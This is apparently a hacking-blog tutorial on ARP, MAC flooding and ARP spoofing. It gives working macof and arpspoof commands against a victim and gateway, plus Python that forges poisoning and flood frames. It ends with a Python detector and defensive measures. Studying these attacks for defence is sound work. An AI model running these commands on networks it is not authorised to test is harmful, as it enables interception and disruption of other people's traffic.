What is ARP Spoofing or ARP Poisoning? | How to perform ARP Spoofing | ARP Spoofing attack
Hey Hackers!!
Today we will discuss what the ARP protocol is, how it works, and what ARP spoofing/poisoning is.
Before learning ARP and its attacks, I recommend that you learn about network sniffing first.
Once you are done with network sniffing and its basic workings, we can begin with ARP basics.
What is ARP ?
ARP stands for Address Resolution Protocol. It runs at the Link Layer (Layer 2) of the OSI model, and its purpose is to resolve an IP address into a MAC address, so that an IP packet can be put into an Ethernet frame addressed to the right interface on the local segment.
Every network interface has a MAC address burned in by its manufacturer. It is meant to be unique, but it is only an identifier, not a credential: on most operating systems it can be changed with a single command, and nothing in ARP checks it.
How ARP works ?
So let’s imagine the scenario shown in the image above, where on a switch-based network “Laptop-1” (on the bottom) with IP address 192.168.1.3 wants to communicate with “Laptop-2” (on the top) with IP address 192.168.1.4. To deliver a frame on a LAN, Laptop-1 needs the MAC address of Laptop-2, because switches forward by MAC address, not by IP.
Laptop-1 first looks in its ARP cache to see whether an entry for Laptop-2’s IP address is present. If it is not, Laptop-1 sends an ARP request as a broadcast to every device on the network, asking “Who has 192.168.1.4?”.
When Laptop-2 receives the request, it sends an ARP reply directly to Laptop-1 saying “192.168.1.4 is at <Laptop-2’s MAC address>”. Laptop-1 saves that mapping in its ARP cache. The ARP cache is therefore a list of IP-to-MAC mappings for every host we have recently communicated with, and most operating systems will also update it when they receive a reply they never asked for, which is exactly what the attacks below rely on.
Now, let’s discuss the Attacks that you can perform using ARP protocol .
ARP attack
Note: it doesn’t matter whether the network is hub based or switch based; ARP spoofing works on both, because it abuses the ARP cache of the hosts, not the switch.
There are two types of attacks that can be performed with ARP:
- MAC Flooding .
- ARP Poisoning/Spoofing .
MAC Flooding
We will discuss MAC flooding first as it is easier. The idea behind this attack is to send a huge number of frames (the tool used here sends them as ARP replies) each carrying a different source MAC address, thereby overflowing the CAM table in which the switch records which MAC address lives on which port. Once the table is full, the switch can no longer look up where a destination is and fails open into hub mode, meaning it forwards traffic out of every port, so every computer on the network (including ours) receives it.
NOTE: This attack does not work on every switch; many newer switches have built-in protection (port security, which limits the number of MAC addresses learned per port) against it.
Macof is part of the dsniff tool suite, and we will use it to fill the CAM table. It does so in well under a minute, since it sends a huge number of frames with random source MAC addresses; a commonly cited figure is about 155,000 per minute.
Macof is preinstalled on Kali Linux; on other distributions install the dsniff package (for example apt install dsniff). Type the following command to run macof against the target:
macof -i eth0 -s 192.168.1.3 -d 192.168.1.5
Let’s review the above command:
macof invokes the tool itself
-i selects the network interface
-s selects the source IP address (here the attacker’s)
-d selects the destination IP address (here the target’s)
The IP addresses only shape the payload; macof randomises the source MAC address of every frame it sends, and it is that stream of fresh source MACs, not the IPs, that exhausts the CAM table.
ARP Poisoning /Spoofing
ARP poisoning is a very popular attack and can be used to get in the middle of a communication. It is achieved by sending fake ARP replies: as discussed earlier, ARP always trusts that a reply comes from the right device. There is no authentication in its design, so a receiving host has no way to verify that the reply was sent by the real owner of the IP address, and it will happily overwrite its cache entry with whatever MAC the reply claims.
In the image above, the attacker tells Alan’s box that the attacker’s MAC address belongs to Brian’s IP, and tells Brian’s box the same about Alan’s IP. Both hosts then address their frames for each other to the attacker, so the attacker receives all network traffic flowing between Alan and Brian. Once the attacker has ARP spoofed his way between two nodes he can sniff, and also modify, the connection. By ARP spoofing between a computer and the LAN’s gateway, the attacker sees everything that computer sends to and receives from outside the LAN.
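To make the frames concrete, here is an added example (not code from the original post, and not part of dsniff) that builds and decodes raw ARP frames with nothing but the Python standard library. It produces the normal request/reply exchange between Laptop-1 and Laptop-2 from the section above, the pair of forged replies that the two arpspoof commands later in this post keep sending, and the random-source frames that macof relies on for MAC flooding. The IP addresses follow the post’s 192.168.1.0/24 LAN; every MAC address is made up.

```python
"""Raw ARP frames: the request/reply exchange, the forged replies behind ARP
poisoning, and the random-source flood behind MAC flooding.

Added example; this is not code from the original post or from dsniff.
Addresses are constructed to match the post's LAN (192.168.1.0/24) and all
MAC addresses are made up.
"""
import os
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{x:02x}" for x in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(x) for x in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Return a 42-byte frame: Ethernet II header + RFC 826 ARP payload.

    dst_mac is the Ethernet destination; it defaults to target_mac and is
    the broadcast address for a normal request.
    """
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac or target_mac),
                      mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,       # hardware type: Ethernet
                      0x0800,  # protocol type: IPv4
                      6, 4,    # hardware / protocol address lengths
                      op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode a frame produced by build_arp (or captured off the wire)."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError(f"EtherType {ethertype:#06x} is not ARP")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"dst_mac": mac_str(dst), "src_mac": mac_str(src), "op": op,
            "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
            "target_mac": mac_str(tha), "target_ip": ip_str(tpa)}


# --- normal resolution: Laptop-1 (192.168.1.3) asks for Laptop-2 (192.168.1.4)
LAPTOP1_MAC, LAPTOP2_MAC = "08:00:27:01:01:01", "08:00:27:02:02:02"


def legit_exchange():
    request = build_arp(ARP_REQUEST, LAPTOP1_MAC, "192.168.1.3",
                        ZERO_MAC, "192.168.1.4", dst_mac=BROADCAST_MAC)
    reply = build_arp(ARP_REPLY, LAPTOP2_MAC, "192.168.1.4",
                      LAPTOP1_MAC, "192.168.1.3")
    return request, reply


# --- ARP poisoning: the two frames that `arpspoof -t victim gateway` and
# `arpspoof -t gateway victim` keep re-sending. Nothing in either frame lets
# the receiver tell that sender_mac does not really own sender_ip.
def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


# --- MAC flooding: the switch's CAM table only learns from the Ethernet
# *source* address, so every frame gets a fresh random unicast MAC.
def flood_frames(count):
    for _ in range(count):
        raw = bytearray(os.urandom(6))
        raw[0] = (raw[0] | 0x02) & 0xFE   # locally administered, not multicast
        fake = mac_str(bytes(raw))
        yield build_arp(ARP_REPLY, fake, "192.168.1.200", BROADCAST_MAC,
                        "192.168.1.1", dst_mac=BROADCAST_MAC)


if __name__ == "__main__":
    for label, frame in zip(("request", "reply"), legit_exchange()):
        print(label, parse_arp(frame))
    for frame in poison_pair("08:00:27:aa:aa:aa", "08:00:27:03:03:03", "192.168.1.3",
                             "08:00:27:11:11:11", "192.168.1.1"):
        print("forged", parse_arp(frame))
    # Putting a frame on the wire needs root and a Linux AF_PACKET socket:
    #   s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    #   s.bind(("eth0", 0)); s.send(frame)
```

Compare the decoded forged replies with the legitimate one: the only difference is that sender_mac and sender_ip do not belong together, and there is no field in the 28-byte ARP payload a receiver could use to notice.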
ARP Spoofing Attack
Before we perform the attack, we need to enable IP forwarding so that the traffic we intercept is passed on to its real destination. Without it, the victim’s packets stop at our box and the victim simply loses connectivity, which is a very loud denial of service rather than a quiet man in the middle. Type the following command in a terminal (as root):
echo 1 > /proc/sys/net/ipv4/ip_forward
“1” means IP forwarding is enabled and “0” means it is disabled. The equivalent sysctl -w net.ipv4.ip_forward=1 does the same thing.
Now that IP forwarding is enabled, we need to gather the following information:
- Attacker’s IP.
- Victim’s IP.
- Default gateway.
You can discover the live hosts (IP and MAC address of each) with a single command on the Linux terminal:
netdiscover
netdiscover itself does not tell you which host is the gateway; ip route shows the default gateway and ip addr shows your own address. On my network the output showed 5 devices, of which “192.168.1.1” is the default gateway, “192.168.1.3” is the victim’s IP address and “192.168.1.4” is the attacker’s IP address.
So what we will do is to tell the default gateway that the victim’s IP address is associated with our MAC address and vice versa.
Let’s do this with arpspoof, which, like macof, is part of the dsniff suite
(preinstalled on Kali; otherwise install the dsniff package).
The basic syntax for arpspoof is as follows:
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
Here eth0 is my interface, -t 192.168.1.3 is the target whose ARP cache we poison (the victim), and the final argument 192.168.1.1 is the host we impersonate (the default gateway). From now on the victim believes the gateway’s IP address lives at our MAC.
Now open a second terminal and run it again with the two IPs swapped: to be in the middle we must poison both directions, so the gateway also has to learn that the victim’s IP lives at our MAC. Both processes stay running, because arpspoof keeps re-sending the forged replies every couple of seconds to override the real ARP traffic.
arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
(Newer dsniff builds, such as the one shipped with Kali, also accept -r, which poisons both hosts from a single command: arpspoof -i eth0 -r -t 192.168.1.3 192.168.1.1.)
Now take a look at the ARP cache on the victim’s machine (arp -a or ip neigh): the gateway’s IP address 192.168.1.1 now maps to our MAC address, and on the gateway the victim’s IP 192.168.1.3 maps to our MAC as well. Since the attacker’s own IP legitimately has that same MAC, the victim’s table now shows one MAC address for two different IPs, which is the classic sign of ARP poisoning.
So we have successfully poisoned the ARP caches, and we can now run a couple of sniffers that capture the traffic, such as dsniff, driftnet or Wireshark. When you stop arpspoof with Ctrl-C it sends correct replies to restore the caches, so do not kill the processes with kill -9 or the victim will stay cut off until its cache times out.
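The check a defender (or a tester confirming the attack took) would run on the victim is the mirror image of the observation above. This added example (not part of the original post) parses the output of ip -4 neigh show and flags the two signatures of ARP poisoning: one MAC address answering for several IPs, and the gateway’s MAC differing from a baseline recorded while the network was clean. SAMPLE_NEIGH is a constructed listing of what the victim 192.168.1.3 would see after the two arpspoof commands, and BASELINE is a made-up pre-attack record; all MACs are invented.

```python
"""Spot the ARP-poisoning signature in a host's neighbour table.

Added example, not part of the original post. SAMPLE_NEIGH is a constructed
`ip -4 neigh show` listing as seen from the victim (192.168.1.3) after the
attacker at 192.168.1.4 poisoned it; BASELINE is a made-up record of the
gateway's real MAC. All MAC addresses are invented.
"""
import re
from collections import defaultdict

SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:aa:aa REACHABLE
192.168.1.4 dev eth0 lladdr 08:00:27:aa:aa:aa REACHABLE
192.168.1.5 dev eth0 lladdr 08:00:27:55:55:55 STALE
192.168.1.7 dev eth0  FAILED
"""

# gateway MAC noted while the network was known to be clean (constructed)
BASELINE = {"192.168.1.1": "08:00:27:11:11:11"}

# rows without an lladdr (FAILED / INCOMPLETE) carry no MAC and are skipped
NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+) dev (?P<dev>\S+) lladdr "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)


def parse_neigh(text):
    """Turn `ip neigh` output into a list of {ip, dev, mac} dicts."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            entries.append({"ip": m["ip"], "dev": m["dev"], "mac": m["mac"].lower()})
    return entries


def duplicate_macs(entries):
    """Map each MAC that appears for more than one IP to the IPs claiming it."""
    ips_by_mac = defaultdict(list)
    for e in entries:
        ips_by_mac[e["mac"]].append(e["ip"])
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


def baseline_changes(entries, baseline):
    """Return (ip, expected_mac, seen_mac) for hosts whose MAC has moved."""
    return [(e["ip"], baseline[e["ip"]].lower(), e["mac"])
            for e in entries
            if e["ip"] in baseline and e["mac"] != baseline[e["ip"]].lower()]


def arp_findings(text, baseline):
    """Human-readable alerts for both poisoning signatures; empty if clean."""
    entries = parse_neigh(text)
    alerts = []
    for mac, ips in duplicate_macs(entries).items():
        alerts.append(f"{mac} is claimed by {len(ips)} IPs: {', '.join(ips)}")
    for ip, expected, seen in baseline_changes(entries, baseline):
        alerts.append(f"{ip} moved from {expected} to {seen}")
    return alerts


if __name__ == "__main__":
    # On a live Linux host, feed it the real table instead of the sample:
    #   import subprocess
    #   text = subprocess.check_output(["ip", "-4", "neigh", "show"], text=True)
    for alert in arp_findings(SAMPLE_NEIGH, BASELINE):
        print("ALERT:", alert)
```

A duplicate MAC is a strong hint but not proof: a router holding several IPs on one interface, a VRRP/HSRP virtual address or proxy ARP will trigger the same rule, so the baseline comparison for the gateway is the more reliable signal. The durable fixes are a static ARP entry for the gateway on sensitive hosts, Dynamic ARP Inspection on managed switches, and a monitor such as arpwatch that logs every IP-to-MAC change.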
Keep Coming for more!!!
Thank you